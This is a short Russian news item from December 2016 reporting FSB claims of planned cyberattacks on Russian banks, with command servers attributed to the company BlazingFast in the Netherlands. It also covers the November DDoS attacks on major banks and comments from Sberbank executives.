    Командные центры для будущих кибератак расположены в Нидерландах и принадлежат украинской компании "BlazingFast", добавили в ФСБ. Сейчас российские спецслужбы проводят мероприятия по нейтрализации угроз, пишет ria.ru.

    В ноябре пять российских банков из топ-10 подверглись DDoS-атакам. Глава Сбербанка Герман Греф заявил, что эта атака была в тысячу раз мощнее, чем те, что наблюдались ранее.

    "Кибернападение планируется сопровождать массовой рассылкой SMS-сообщений и публикациями в социальных сетях (блогах) провокационного характера в отношении кризиса кредитно-финансовой системы России, банкротства и отзыва лицензий у ряда ведущих банков федерального и регионального значения. Акция направлена на несколько десятков городов России", — говорится в сообщении ФСБ.

    После этого первый зампред правления Сбербанка Лев Хасис рассказал журналистам, что компании удалось выяснить, откуда координировались действия хакеров. Назвать точное место он отказался, уточнив, что это касается "межгосударственных отношений".

     

    orig: 2016-12-02 07:57:46 / https://www.anti-malware.ru/news/2016-12-02/21599 (click post title)



    Далее...